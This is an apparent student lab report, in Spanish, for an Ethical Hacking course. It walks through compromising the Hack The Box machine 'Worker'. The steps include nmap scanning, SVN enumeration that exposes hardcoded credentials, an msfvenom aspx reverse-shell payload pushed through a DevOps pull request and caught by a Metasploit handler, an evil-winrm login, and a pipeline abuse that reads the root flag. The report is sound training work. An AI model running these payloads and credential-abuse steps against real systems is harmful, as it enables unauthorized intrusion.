Informe Worker (2)

Vista previa del material en texto

Worker
Curso: 6/1 TICS
Semestre: 6TO Semestre
Informe de evaluación de la maquina
Periodo: 2020-1 Entorno Virtual
Docente: ING. Ivan Coronel
Asignatura: Ethical Hacking
FACULTAD DE SISTEMAS Y TELECOMUNICACIONES
Contenido
1.	Tabla de control de documentos	3
2.	Resumen	4
3.	Metodología	5
4.	Informe de evaluación	6
5.	Resultados obtenidos	28
6.	Conclusión y recomendación	30
7.	Apéndice	30
8.	Bibliografía	31
1. Tabla de control de documentos
	AUTORES
	FECHA DE ENTREGA
	PÁGINAS
	VERSIÓN
	ESTADO
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	30/09/2020
	4
	1,0
	Metodologías de Escaneos 
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	10/10/2020
	9
	1.1
	Escaneos de Hack the box: Worker.
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	13/10/2020
	21
	1.2
	Resultado Final: Procedimiento y Solución 
2. Resumen
	Descripción del proyecto
La partica que realzaremos será en la paginas oficial de Hack the box la cual escogeremos una máquina para obtener los archivos user.txt y root.txt con la ayuda del sistema operativo Kali Linux esto será en un habiente virtual también utilizaremos Nmap y Metasloit framework para tener acceso a nuestra maquina ya previamente seleccionada con los cuales detallamos todos los puntos importante en este informe.
Metas
· Reconocimiento de la plataforma o maquina ya seleccionada, se le realizar el ingreso por su dirección ip para realizar un escaneo y obtener información.
· Escaneo y búsqueda de los puertos abiertos en las cuales utilizaremos el comando nmap para obtener exploit y poder acceder a las maquinas. 
· Obtener acceso con la ejecución de los exploit encontrados y sus respectivos payload los cuales nos permitirán obtener las credenciales de los archivos user.txt y root.txt. 
	Encontrar recuentos
Hallazgos totales
Obtuvimos 2 hallazgos importante que son los usuarios.txt y root.txt los cueles nos permitió tener acceso
fechas
Patada inicial
Prueba activa
13/10/2020
Entrega de informes
3. Metodología
Mediante una evaluación previa a nuestro objetivo Hack The Box controlada y que contiene máquinas virtuales que permite obtener con facilidad la dirección ip dando así una facilidad de escanear y obtener los puertos para posterior penetrar y obtener informaciones relevantes.
Debido a la información proporcionada anterior evaluamos y decidimos por una aplicación que nos ayuda a obtener información de la misma como es Nmap una herramienta que nos permite navegar redes más aun para obtener host simple a través de paquetes IP; obteniendo información de una red disponible, servicios que utiliza con su versión en el momento, bajo qué sistema operativo esta creado y corre, firewall utilizado por la misma.
Posterior a una conexión vpn para administrarlo desde consola de sistema operativo de Kali y evaluación oportuna de cada uno de pasos importantes para obtener lo requerido; uno de ellos es detectar los puertos abiertos e identificar si existen usuarios por defecto. Con la información de este paso se realizó la búsqueda de los exploit para acceder a las maquinas; mediante la ejecución de los exploit con los respectivos payload se procedió al ingreso en las maquinas objetivos para poder descubrir las credenciales de los archivos user.txt y root.txt.
4. Informe de evaluación
En el siguiente informe se detalladle los hallazgos durante la penetración hacia la maquina Worker de la plataforma HACK THE BOX. La máquina Worker es un servidor web con sistema operativo Windows Server 2008 el cual cuenta con un sitio web de noticias el cual usa programas como:
· Subversión: es una herramienta de control de versiones open source basada en un repositorio cuyo funcionamiento se asemeja enormemente al de un sistema de ficheros. Es software libre bajo una licencia de tipo Apache/BSD.
 Detalle: 
Conexión a la maquina mediante VPN, para permitir realizar el escaneo de los puertos del servidor mediante la herramienta nmap y la siguiente línea de comando:
root@kali:/home/kali/Desktop/comandos # nmap -sV -O -sC -A -oN Worker.txt 10.10.10.203
Ilustración 1 Escaneo de nmap a la maquina worker
En el puerto 3690 que se encuentra abierto se está ejecutando un servidor svnserve, el cual es parecido a un servidor de repositori como git. 
ENUMERACION	
Ingresamos nuestro navegador preferido y transcribimos la dirección ip dirigiendo el puerto 80 (10.10.10.203/80) nos presentara un servidor web determinado de IIS 
Ilustración 2 página oficial de worker
SVN es un sistema de control de versiones usado para que varios desarrolladores puedan trabajar en un mismo proyecto en forma más o menos ordenada. Tiene una arquitectura cliente servidor con controles de concurrencia para cuando varios desarrolladores están trabajando en el mismo archivo y funciona más o menos así. En algún servidor se monta un repositorio SVN. (Autor)
Installer subversion
sudo apt-get install subversion
Que instalará subversión y cualquier otro paquete del que dependa.
Datos del paquete
	Paquete
	Subversion
	Versión
	1.9.5-1
	Mantenedor
	Peter Samuelson
	Descripción
	Sistema de sistema de control de versiones avanzado. Los sistemas de control de versiones permiten que muchas personas (que pueden estar distribuidas geográficamente) colaboren en un conjunto de archivos (código fuente, sitios web, etc.). Subversion comenzó con un paradigma CVS y es compatible con todas las características principales de CVS, pero ha evolucionado para admitir muchas características que los usuarios de CVS a menudo desearían tener.
Ilustración 3 instalación de subversión
Svn list: Enumere cada TARGET archivó y el contenido de cada TARGET directorio tal como existen en el repositorio. Si TARGET es una ruta de copia de trabajo, se utilizará la URL del repositorio correspondiente..
Con --verbose svn list muestra los siguientes campos para cada elemento:
· Número de revisión de la última confirmación
· Autor de la última confirmación
· Si está bloqueado, la letra " O " (consulte la sección anterior sobre información de svn para obtener más detalles).
· Tamaño (en bytes)
· Fecha y hora de la última confirmación
A continuación ejecutamos el comando
	root@kali:/home/kali/Desktop/comandos# svn list svn://10.10.10.203
Podemos observar que encontramos diferentes versiones la cual elegiremos la correcta verificamos verifiquemos git commit para obtener información. Podemos ver algunos archivos, dimension.worker.htb / y moved.txt las cuales vamos a exportamos.
Ilustración 4 información del svn en Worker
Seguimos y realizamos la exportación de ya lo anterior nombrado con el comando 
	root@kali:/home/kali/Desktop/comandos# svn export svn://10.10.10.203/dimension.worker.htb/
El primer directorio (dimension.worker.htb) es solo un rabbithole como muchos otros subdominios que podemos encontrar con DNS fuzzing.Si encuentra otros archivos (como aspx shell), este es solo el archivo de otros usuarios.
Ilustración 5 dimension.worker.htb
Al revisar dimension.worker.htb/ son puro directorios y archivos en el que no existe información relevante.
	root@kali:/home/kali/Desktop/comandos# svn export svn://10.10.10.203/moved.txt
Procedemos a leer lo que tiene el archivo txt con el comando.
	root@kali:/home/kali/Desktop/comandos# cat moved.txt
Dentro del archivo se encontró un link abrimos el link con el navegador para ver que nos aparecerá.
 
Ilustración 6 contenido de moved.txt
No nos permite conectar así que agregamos en la ip y la dirección a nuestro host con el comando nano al directorio /etc/host
	root@kali:/home/kali# nano /etc/hosts
Ilustración 7 GNU nano
No dirigimos al link que encontramos el cual es: http://devops.worker.htb/
Ilustración 8 Worker.htb
Digitamos la dirección en el navegador y nos pide las credenciales en el sitio utiliza RELAM básico, con autentificación NTLM debió a esta autentificación no permitirá la conexión de manera fácil.
NTLM: NT LAN Manager conocido como NTLM fue el primero en Windows NT y es una mejora respectoal protocolo LM. A diferencia de las contraseñas LM, que usan el conjunto de caracteres ASCII, las de NTLM están basadas en el conjunto de caracteres Unicode, se reconocen las minúsculas y las mayúsculas, la longitud aumenta hasta 128 caracteres.. (juansa, 2008)
A continuación utilizaremos nuevamente svn para realzar una revision con la copia del directorio dimension.worker.htb/ exportado anteriormente.
	root@kali:/home/kali/Desktop/comandos# svn checkout -r 2 svn://10.10.10.203
En la revision 2 se encontró un archivo deploy.ps1porcedemos a la lectura con el comando cat
Ilustración 9 Credencial
En el cual encontramos unas credenciales:
	$user = "nathen"
$plain = "wendel98"
Esta etapa vamos a realizar la exportación la cual no dirigiremos a la página de devops.workrt.htb e ingresaremos con las credenciales que encontramos anterior mente : http://devops.worker.htb/
Ilustración 10 Inicio de sección
Nos mostrara la pagina principal
Ilustración 11 Página Principal
Una vez dentro de la página procedemos a buscar información relevante nos dirigimos a la ruta en el cual se permite la creación de una nueva sucursal. En la cual crearemos una nueva sucursal.
	http://devops.worker.htb/ekenas/SmartHotel360/_git/spectral/branches
Ilustración 12 Nuevo branch
Ahora cargaremos una shell aspx dentro del repositorio.
asp shell: es un archivo que se ejecuta en servidores asp. Con este shell, puede piratear servidores fácilmente y navegar fácilmente en el servidor. Es uno de los mejores caparazones de áspid del mundo. El shell más utilizado es el shell aspx. Con la sencilla interfaz, puede superar cómodamente la seguridad de muchos servidores.
	root@kali:/home/kali/Desktop/comandos# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=4444 -f aspx -o htb12.aspx
 Crearemos un archivo htb.aspx con Metasloit
Ilustración 13 Creación del asp shell
Subimos el archivo creado 
Ilustración 14 achivo subido
Creamos un pull request
Ilustración 15 Create pull request
Ilustración 16 Confirmamos la creación
Ilustración 17 Aprobar
Ilustración 18 completamos los requisitos
Ilustración 19 correcto
Nota : para poder acceder a esta direccion http://spectral.worker.htb/htb.aspx
Es necesario agregarla en nuestro archivo hots en el directorio etc y tener abiero el meta exploit como oyente
Abrimos el oyevte enm metasploit
Ilustración 20 Metasploit
NOTA: EL proceso debe realizarse de manera rápida debido a que la maquina Worker borra el shell y toca realizar de nuevo desde la creación del branch.
Ilustración 21 sección
	use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.238
set LPORT 4444
run
Ilustración 22 ejecucion del proceso
No cerrar la página abierta porque después se cierra el proceso.
Ilustración 23 archivos
Hay tantos usuarios en él, pero solo robisl es útil porque es el único usuario remoto en la lista.
Ilustración 24 usuario robisl
	robisl = wolves11
En la lista existe gran cantidad usuarios pero solo este usuario y sesta contraseña son los que nos permite conexión rectamente con evil-winrm.
Ganar acceso en el nivel de usuario
Instalar la herramienta evil-winrm
Vil WinRM es el último shell de WinRM para hackear / pentesting. WinRM (Windows Remote Management) es la implementación de Microsoft del protocolo WS-Management.
Un protocolo estándar basado en SOAP que permite que el hardware y los sistemas operativos de diferentes proveedores interoperen. Microsoft lo incluyó en sus sistemas operativos para facilitar la vida de los administradores de sistemas.
Este programa se puede usar en cualquier servidor de Microsoft Windows con esta función habilitada (generalmente en el puerto 5985), por supuesto, solo si tiene credenciales y permisos para usarlo.
Para poder instalar evil-winrm se necesita instalar ante las siguientes herramientas:
	root@kali:/home/kali/Desktop/comandos# gem install stringio
root@kali:/home/kali/Desktop/comandos# gem install winrm
root@kali:/home/kali/Desktop/comandos# gem install winrm-fs
root@kali:/home/kali/Desktop/comandos# gem install colorize
Ilustración 25 comando de instalación de evil-winrm
Comando para la conexión remota
	root@kali:/home/kali/Desktop/comandos# evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Ilustración 26 Establecemos conexión con evil-winrm
Buscamos con los siguientes comando el user.txt
	*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..
*Evil-WinRM* PS C:\Users\robisl> ls
*Evil-WinRM* PS C:\Users\robisl> cd Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
c07f8a776d7e59e78195c28df3cd8c8a
 Aquí encontramos el user.txt: c07f8a776d7e59e78195c28df3cd8c8a
Ilustración 27 user.tx
Escalar privilegios
Nos dirigimos a http://devops.worker.htb para iniciar sesión con las credenciales obtenidas
Usuario: robisl 
Password:wolves11
Ilustración 28 ingreso con las credenciales
Ilustración 29 Ingreso Pipelines
Pipeline: consiste en una cadena de elementos de procesamiento (procesos, subprocesos, corrutinas, funciones, etc.), dispuestos de manera que la salida de cada elemento sea la entrada del siguiente; el nombre es por analogía a una tubería física. Por lo general, se proporciona cierta cantidad de almacenamiento en búfer entre elementos consecutivos.
Ilustración 30
Ilustración 31
Ilustración 32
Commando
	pool: 'Setup'
steps:
- script: type C:\Users\Administrator\Desktop\root.txt
displayName: 'Run a one-line script'
Haga clic en New Pipeline> Azure Repos Git> PartsUnlimited> Starter Pipeline .Será recibido con una ventana similar: (Autor, CTF Tricks, 2020)
Ilustración 33
Haga clic en Guardar y ejecutar> seleccione Crear una nueva rama para esta confirmación e inicie una solicitud de extracción > Guardar y ejecutar.
Espere de 5 a 10 minutos para que se construya y se ejecute. La máquina está muy retrasada y en algún momento te arrojaría un error incluso si hiciste todo bien. En ese caso, comience por crear una nueva tubería nuevamente. (Autor, CTF Tricks, 2020)
Una vez finalizada la compilación, aparecerá una ventana similar.
Ilustración 34 listado
contraseña dentro del archivo root.txt
Ilustración 35 archivo root.txt
5. Resultados obtenidos
Ya obtenido todos los datos que requeríamos nos dirigimos a la página de hack the box y posterior se obtuvo.
Contraseña dentro del archivo user.txt
c07f8a776d7e59e78195c28df3cd8c8a
cad5f466820843e89362a01a43458b45
Ilustración 36 Objetivo Worker
Ilustración 37 Objetivo logrado
Ilustración 38 LISTO: D
6. Conclusión y recomendación
Como hemos visto en el transcurso del proceso de poder terminar esta práctica con éxitos debemos tomar en cuenta algunos puntos importantes que planteamos durante este proceso los cuales nos ayudaron con éxito pero cabe recalcar que al momento de poder avanzar encontrábamos algunas cosas en la cuales no teníamos conocimiento por lo que nos dirigimos a diferente fuentes.
7. Apéndice
	
APÉNDICE A - CLASIFICACIÓN DE CRITERIOS 
A continuación se muestran los criterios de calificación de riesgo utilizados para clasificar este informe:
	Gravedad
	Descripción
	ALTO
	Permitir la escalabilidad de privilegio en la cual nos permitirá acceder credenciales  robisl: wolves11.
	MEDIO
	Enumeración obtener acceso al puerto 3690 y su exploit adecuado a utilizar para así poder tener acceso a los repositorios encontrados y utilizar los adecuados. 
	BAJO
	Explotación y Búsqueda de información con la ip de la máquina para tener una mayor un mayor entendimiento.
Bibliografía
Autor. (18 de agosto de 2020). CTF Tricks. Recuperado el 12 de Octubre de 2020, de HACK THE BOX - Trabajador 10.10.10.203: https://hacktheboxwriteups.blogspot.com/2020/08/nmap-scan-nmap-10.html?m=1
Autor. (s.f.). Lihuen 6. Recuperado el 12 de Octubre de 2020, de Cómo usar SVN: https://lihuen.linti.unlp.edu.ar/index.php/C%C3%B3mo_usar_SVN#:~:text=SVN%20es%20un%20sistema%20de,funciona%20m%C3%A1s%20o%20menos%20as%C3%AD.
Installlion. (s.f.). Installlion.com. Recuperadoel 12 de octubre de 2020, de Instalar en pc subversion: https://installlion.com/kali/kali/main/s/subversion/install/index.html
juansa. (26 de Diciembre de 2008). Windows Server. Recuperado el 2020 de Octubre de 2020, de Seguridad: Autenticarse, NTLM, NTLMv2, Kerberos: https://blogs.msmvps.com/juansa/blog/2008/12/26/seguridad-autenticarse-ntlm-ntlmv2-kerberos/
Sussman, C., Pilato, M., & Fitzpatrick, B. (2019). Control de versiones Open Source de siguiente generación. Recuperado el 12 de octubre de 2020, de Subversion : http://svnbook.red-bean.com/en/1.7/svn.ref.svn.c.list.html